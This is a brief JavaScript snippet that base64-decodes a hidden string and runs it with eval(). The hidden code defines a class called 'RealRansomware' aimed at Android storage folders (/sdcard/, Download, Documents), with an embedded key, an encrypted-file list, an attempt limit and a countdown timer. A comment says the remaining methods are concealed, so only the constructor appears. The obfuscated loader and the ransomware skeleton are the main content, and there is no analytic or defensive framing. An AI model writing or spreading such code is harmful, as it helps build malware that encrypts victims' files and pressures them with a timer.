const ガンツ = 'Y2xhc3MgUmVhbFJhbnNvbXdhcmUgewogIGNvbnN0cnVjdG9yKCkgewogICAgdGhpcy5rZXkgPSBCdWZmZXIuZnJvbSgnTzJZeU5vYVhKbGJtTjVjM1J5WlhJdWIzWm5MV0Z3Y0d4cFkyRjBhVzl1JywnYmFzZTY0Jyk7CiAgICB0aGlzLnRhcmdldERpcnMgPSBbJy9zZGNhcmQvJywnL3NkY2FyZC9Eb3dubG9hZC8nLCcvc2RjYXJkL0RvY3VtZW50cy8nXTsKICAgIHRoaXMuZW5jcnlwdGVkRmlsZXMgPSBbXTsKICAgIHRoaXMuYXR0ZW1wdHMgPSAwOwogICAgdGhpcy5tYXhBdHRlbXB0cyA9IDEwOwogICAgdGhpcy50aW1lckR1cmF0aW9uID0gNjAwOwogICAgdGhpcy50aW1lckFjdGl2ZSA9IHRydWU7CiAgICB0aGlzLnN0YXJ0VGltZSA9IERhdGUubm93KCk7CiAgICB0aGlzLnVpID0gdGhpcy5jcmVhdGVVSSgpOwogIH0KICAvLyAuLi4gbWV0aG9kIGxhaW5ueWEgZGllbmtyaXBzaSBoYXJkIC4uLgp9';

function 復号化(data) {
  return Buffer.from(data, 'base64').toString();
}

eval(復号化(ガンツ));
